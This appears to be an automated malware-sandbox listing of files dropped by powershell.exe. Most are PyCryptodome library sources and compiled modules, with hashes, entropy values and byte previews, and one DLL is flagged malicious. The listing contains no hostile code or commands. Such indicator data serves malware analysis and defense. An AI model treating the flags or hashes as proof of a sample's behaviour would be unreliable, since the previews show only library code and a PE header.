                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1968
                                                                                                                                                                                                              Entropy (8bit):4.96168817055765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
                                                                                                                                                                                                              MD5:CCD084ED08A6E3D89DC9B9ECD62D524D
                                                                                                                                                                                                              SHA1:439DDFB5344BA4510F46A29913E7764824094696
                                                                                                                                                                                                              SHA-256:98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
                                                                                                                                                                                                              SHA-512:354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2257
                                                                                                                                                                                                              Entropy (8bit):5.237546031397441
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:iIjDsj8MtyHquSS9zvu8DjtRfanT2xuDDit:PsYMQ1SsDxxRfayZt
                                                                                                                                                                                                              MD5:893D357F2CBC05E2D4D42389B8B8DB36
                                                                                                                                                                                                              SHA1:0006A33B4B0F045E60271055D30104437FFAA6E0
                                                                                                                                                                                                              SHA-256:A8B44F41875F849257BB79C942B8D26F07BFB97994A50D455A2B14649A447EB2
                                                                                                                                                                                                              SHA-512:64F68E775B0A89E2AA843CC4C72FB08D518CF8D57B2B29108A14E44F7F6F0EA8F1B8782858111CDBBF521CD35C37BC6927924AC9A2D67802D2FC226CC29048FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.d...Z.y.)......c..........................|.d.z...d.k7..r.t.........d...........|.j...........................}.|.|.kD..r.t.........d.|.|.f.z.............|.d.z...|.|.|.|.d...S.).a....Create a stateful counter block function suitable for CTR encryption modes... Each call to the function returns the next counter block.. Each counter block is made up by three parts:.. +------+--------------+-------+. |prefix| counter value|postfix|. +------+--------------+-------+.. The counter value is incremented by 1 at each call... Args:. nbits (integer):. Length of the desired counter value, in bits. It must be a multiple of 8.. prefix (byte string):. The constant prefix of the counter block. By default, no prefix is. used.. suffix (byte string):. The constant postfix of the counter block. By default, no suffix is. used.. initial_value (integer):. The initial value of the
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3248
                                                                                                                                                                                                              Entropy (8bit):5.650288368009269
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1lm7nAeKJdRXl9OT2xRO7LumeTxes2UkxDWlxeKbNRTAyKqnQfCgQJk6N:1lmzAeqzFISVt2UkAre63AnqnQfIJzN
                                                                                                                                                                                                              MD5:BFFF8EAD34CC80BF4ABE2AF1A7DDF109
                                                                                                                                                                                                              SHA1:5E353DB6C48CB49A988C913A4C6797C646D47D69
                                                                                                                                                                                                              SHA-256:983E4CB8A13A36D4C9AA0F51C018EC7B068CDE53485B681D0D2ABCF05100044C
                                                                                                                                                                                                              SHA-512:B519C34E53EC01F635F6D376E8A9D1D95BF317E7E25AFDFA92105203968FD084AC7B6B86C69F1341801816C735D9E13CB03895BB1186B126BF8FED8D89F59AAA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eE.........................&.....d.d.g.Z.d.d.l.....d.d...Z.d.d...Z.y.)...pad..unpad.....)...*c...........................|.t.........|.........|.z...z...}.|.d.k(..r.t.........|.........|.z...}.|.|.z...S.|.d.k(..r"t.........d.........|.d.z...z...t.........|.........z...}.|.|.z...S.|.d.k(..r"t.........d.........t.........d.........|.d.z...z...z...}.|.|.z...S.t.........d...........).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. ..pkcs7..x923r...........iso7816......Unknown padding style)...len..bchr..ValueError)...data_to_pad..block_size..style..padding_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16826
                                                                                                                                                                                                              Entropy (8bit):5.45076287707543
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:0uWaBMeMGIt5d+uGQgXmKLHift1IxnJNBajiF0TF2:0uWoMpGItfgPCfbIxJr7FcF2
                                                                                                                                                                                                              MD5:5113E5D36CF0FBC2FFFE16773C2BFE05
                                                                                                                                                                                                              SHA1:5A0282078AE94D37A9C13AC3F619560FEC6233C7
                                                                                                                                                                                                              SHA-256:DCE29CA6BD30DFEB4C762FD3DAB4ADE2AE6504FCF2C95BA746493945247F19D3
                                                                                                                                                                                                              SHA-512:7C83AB7E3D1C93D1700F969C5A08ED035C215941AF5A40BED64213879E9009A581347C7763BD79474D034400A70BDEE6BEC2461FEAD329790246B42F2027C8DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eJT.............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..Z.d#..Z.d$..Z.d%..Z.d&..Z.g.d'..Z.y.)(.....)...print_functionN)...bord..bchr..0000.......0001.......0010.......0011.......0100.......0101.......0110.......0111.......1000.......1001.......1010.......1011.......1100.......1101.......1110.......1111c.....................X.....t.........d...|.........}.t.........d...|.........}.d.j...................|.........S.).z,Convert a key into a string of binary digitsc...........................t.........|.........S.).N).r........xs.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/RFC1751.py..<lambda>z._key2bin.<locals>.<lambda>(...s.......t.A.w.......c.....................4.....t.........|.d.z.......t.........|.d.z.......z...S.).Nr....r#...)...binaryr'...s.... r)...r*...z._key2bin.<locals>.<lambda>)...s.......v.a.1.f.~...q
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1156
                                                                                                                                                                                                              Entropy (8bit):4.944869463452275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:opJmI4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBlg2x4g2I:GmnASgf++BcD4YaQVprGGBS2xTX
                                                                                                                                                                                                              MD5:B101A0135BB256FEA1257DAADDBA7011
                                                                                                                                                                                                              SHA1:BA613F9CE97F545D2BCD8B38E2588BC6A86D5793
                                                                                                                                                                                                              SHA-256:5431B76F0B2F65175CE4B8B70949B832AEE5765084F3619422D6D54952813831
                                                                                                                                                                                                              SHA-512:55674256C1BD63595D19D0750F9AE50D3C1DC0FDA6204C1BE0A9F4DA6786DBDB4C4D748B6CEE06DAE63940BC2F05961BCC9F6EBDD7699D1E04449AA4AB1485F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.Z.g.d...Z.y.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..PaddingN)...__doc__..__all__....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):861
                                                                                                                                                                                                              Entropy (8bit):4.743941844557793
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:wpnbnTXgAiXrekrOS07Z7Z//2IkbREg8rUSlOWxAAdaPboXk:mTQAib7rOSkpZX2xl0U/hAcPboXk
                                                                                                                                                                                                              MD5:C377B0D0A2F550880994E74CF20102AC
                                                                                                                                                                                                              SHA1:E42446FFE32ACF82B02D12B0026A2C70D536C7A6
                                                                                                                                                                                                              SHA-256:74A56DCAFDBC7EB45964F971D520BCD7BDB9990BEB463B83C5C7650E18788E1E
                                                                                                                                                                                                              SHA-512:E27E6043A1367B1A7FC387B5A323CBA44448F0A2560D6557DCADED5DEBDC9DF3B01B7021B683743924C65789FD9BFDEF94C54A254160F621102B17B5F70C8B19
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.d.l.m.Z.....e.d.d.........Z.d...Z.d...Z.y.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................*.....t.........j...........................S...N)..._raw_cpuid_lib..have_aes_ni........mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/_cpu_features.pyr....r....)...s...........%..%..'..'r....c.....................*.....t.........j...........................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r......<module>r........s(.........>..;....+.+A...,/....0......(....'r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                              Entropy (8bit):5.155738794548557
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:lcv+6HTZ2HBZ8SlwC8El3OyrPE2x5lNSIxnn0Yzqtp:lcm6SZkCreyTE2x5l7xnfqD
                                                                                                                                                                                                              MD5:F55F01AC5C1DDBA7EF04F0C2996AB605
                                                                                                                                                                                                              SHA1:25392803B553286AFDD1E44F38CCCE2FA8EA6EB3
                                                                                                                                                                                                              SHA-256:269554CB6903904C50E403F934DAF27D0D7D10A5AEACC27EB032EE327B879277
                                                                                                                                                                                                              SHA-512:1F526E56D050B6DB5168863365822A07CFB6616620DC9F62F8B288077624B16B303FC12F58199A55E77358E34C5FA801E6A735D1EABB9C564016B8EBAFDA9F1B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.d.l.Z.d...Z.y.)......Nc.....................R.....|.d.....d.k7..r.t.........d...........t.........|.d.d...........|.g.z...}.t.........j...................j...................t.........j...................j...................t.........................\...}.}.t.........j...................j...................|.d.........}.t.........j...................j...................|.g.|.......S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12949
                                                                                                                                                                                                              Entropy (8bit):5.153107212502531
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WXZddaN1GLnVAOI+/ylEr4GKlAoBQKlUx8mTwrjYCMGQpPCSS9O62ipuowY:GZd4N14nmlg8dGKl9pavujYLGQlGH
                                                                                                                                                                                                              MD5:99791F8E012D03AFF225031A0D3C7834
                                                                                                                                                                                                              SHA1:83337F2D97C51690C29F0E6301AADF690E26E03B
                                                                                                                                                                                                              SHA-256:77179C4FE925BBBF71C866DA6B850369B7DD2EDCBEA1D85419682B74CA7196D6
                                                                                                                                                                                                              SHA-512:1BA9681F5708EA173D2AA2BD5536B7D59CEF910FEE3E8C502FA3A9D81FF5FE953D4B2421EBCA42771AD9A1BDB21A0EEF6E95A135DA700BF51E9CF3DA82902608
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e}*.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................d.....d.k...rBd.d.l.Z.g.Z...e.j...........................D.]'..\...Z.Z.Z.e.e.j...................k(..s...e.j...................e............)..n.d.d.l.m.Z...e.j$..................Z.e.e.f.Z...G.d...d.e.........Z...d.e.j0..................v.r!e.j2..................j4..................d.k(..r...e.d...........e.j...................d.k\..r.e.j8..................d.k(..r...e.d...........d.d.l.m.Z.....e.........Z.e.j@..................Z!e.jE..................e.jG..................d.................Z$e.jG..................d.........jJ..................jL..................Z'd...Z(d...Z)e)Z*e)Z+e)Z,d...Z-d/d...Z.d...Z/d...Z0d...Z1..G.d...d.e.........Z2d...Z3d.Z4..G.d*..d+e.........ZLd,..ZMd-..ZNd...ZOy.#.e.$.r...d.d.l5Z5d.d.l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d.l9m:Z:..d.d.l5m;Z'..d.Z!g.Z<d...Z,d ..Z(d!..Z/d"..Z0e5jz..................Z>d.Z?e5j...................j...............
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40615
                                                                                                                                                                                                              Entropy (8bit):5.26162195253553
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:eXqPoFGtp4WG1rfltw3nD+/t3YW55q2gVKvfZSBOy3:e+jLqxtwXDGt3YWDq2gcfQBh3
                                                                                                                                                                                                              MD5:78A7074BE84E9FBF868C713ED4A9EB7D
                                                                                                                                                                                                              SHA1:D815AC39AF73063624D3D06940023C29C4DF8972
                                                                                                                                                                                                              SHA-256:81C66EC093BF186F80DD9F525C44C9E2768EB8F1168DA640FD5C95E78E84389F
                                                                                                                                                                                                              SHA-512:0737A4F527B85DA7B047FCB7081F25428D26F699E7D2F500B6782B9E64BA4982F8947877D60B6D869D055D06F0EFAFF29C0E77A8F229BF04A0C1567B29274AF0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eq...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfc.....................D.....d.}...|.|.z...}.|...x.s...|.d.k\..S.#.t.........$.r...Y.y.w.x.Y.w.).Nr....F)...TypeError)...x..only_non_negative..tests.... .dC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/asn1.py.._is_numberr....(...s=.........D.........4.x......!.. ..*.A...F..*....................s................c.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...BytesIO_EOFzeThis class differs from BytesIO in that
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65681
                                                                                                                                                                                                              Entropy (8bit):5.282887609749514
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:u9eNq1WKLhZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXl:WcKlpyUy0lsEgZOtg78sI6VTLQ5DRvvI
                                                                                                                                                                                                              MD5:FE38EFEDEAC7EDB8DBAA44168F359F1D
                                                                                                                                                                                                              SHA1:C5671E13DFC250BD970883B90834EF5D95488D8C
                                                                                                                                                                                                              SHA-256:5AF417D449A36243814A6D77179FC3A5D17661FF032867256C321B73567EEA2A
                                                                                                                                                                                                              SHA-512:B24601CB14886BF26409B88D8F8D39E08953F2C16E2158DF522BB394A3E201BA481C737C0A45D7613EB9D6BA20FEC6D96045D2E95172ECAA435C01E9255ECC8B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eh~........................".....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j...................d.d...d.k\..r.e.j...................Z.n.d...Z.e.j...................d.d...d.k\..r.d...Z.n.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.Z.d.d...Z.d...Z.d.d.l.Z.d.d...Z.d...Z.d.Z.y.)......N)...Random)...iter_rangec..........................|.d.k(..r.t...................|.d.k...s.|.d.k...r.t.........d...........t.........|.|.........\...}.}.|.d.k7..r.|.d.k7..r.|.d.z...}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..qs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/number.py..ceil_divr....%...sW...........A.v.....!..!....A...1.q.5......../../....!.Q.<.D.A.q....Q...Q.!.V....Q........H.....c.....................B.....|.d.k...r.t.........d...........|.j......................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7049
                                                                                                                                                                                                              Entropy (8bit):4.928475235919222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Yppa1YDLOjIWTmpSaRBF7mxzw3VYzO6BJcerI2mYVe07P31PVFU:YfaeUIW82uirckyynP3vFU
                                                                                                                                                                                                              MD5:103C85B15FC29D2C0237D3775DD1991A
                                                                                                                                                                                                              SHA1:3C7A95FEB43AE3DD588661B93ED3A0D7AA0A0801
                                                                                                                                                                                                              SHA-256:501B9410AF93989544604F51717DF1F88A6EDFEB21AB7CB1EA0B411490AC5BC6
                                                                                                                                                                                                              SHA-512:AE122401B551BB8E6F9C8B807521239977B381BFD16997C5C00C5F1DC9DBFBE309249F84E0B3D1DA76269441084CBA96A319C320EB9CEF6956DB9AF92C2130D1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.ez.........................Z.....d.Z.d.d.l.Z.d.d.l.Z.e.j...................d.....d.k(..rLd...Z.d...Z.d...Z.d...Z.d#d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d...Z.d...Z.d...Z...e.j(..................d.e.f.d.d.i.........Z.e.Z.n>d...Z.d...Z.d...Z.d...Z.d#d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d...Z.d...Z.d ..Z.d.d!l.m.Z...e.Z.d"..Z.[.[.y.)$a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to be
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4251
                                                                                                                                                                                                              Entropy (8bit):5.1859041653380675
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Sffkv/3lfZ9TNJwyJfT/8i8uz/Z6L0x422q54x:Sk3FP7h8Uu0VOx
                                                                                                                                                                                                              MD5:0DE7404EBD72B0FC12CB57CEE3030993
                                                                                                                                                                                                              SHA1:DDDF5659CD09AC956F41AC91698CA5D2C63BCD5D
                                                                                                                                                                                                              SHA-256:75F2BCE0E883364683E154EC187E3B631DB7225C26540417909962B249EC113D
                                                                                                                                                                                                              SHA-512:0A7256F717F458F20ED4264BE939E67DCD72789844E2E080F67D2C896908CDFE826DB213ED779253EABD93709974D75B8D7B43FD6E9BD7AC769D845260EAFF0A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e..........................L.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d.d...Z.d.d...Z.d...Z.y.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc..........................t.........|.........t.........|.........k7..r.t.........d...........|...t.........t.........|.................}.nF|.}.t.........|.........s.t.........d...........t.........|.........t.........|.........k7..r.t.........d.t.........|.........z.............t.........j...................t.........|.........t.........|.........t.......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2035
                                                                                                                                                                                                              Entropy (8bit):5.0956096784751965
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
                                                                                                                                                                                                              MD5:D4DD7789231F56101EAA341F5FD21A95
                                                                                                                                                                                                              SHA1:81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
                                                                                                                                                                                                              SHA-256:38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
                                                                                                                                                                                                              SHA-512:268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                              Entropy (8bit):4.354688723015057
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                                                                                              MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                                                                                              SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                                                                                              SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                                                                                              SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.730605326965181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                              MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                              SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                              SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                              SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2225
                                                                                                                                                                                                              Entropy (8bit):5.261890106278258
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
                                                                                                                                                                                                              MD5:4505C49A1831D0C93256DA8E78C1564B
                                                                                                                                                                                                              SHA1:63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
                                                                                                                                                                                                              SHA-256:B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
                                                                                                                                                                                                              SHA-512:3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
                                                                                                                                                                                                              Malicious:false
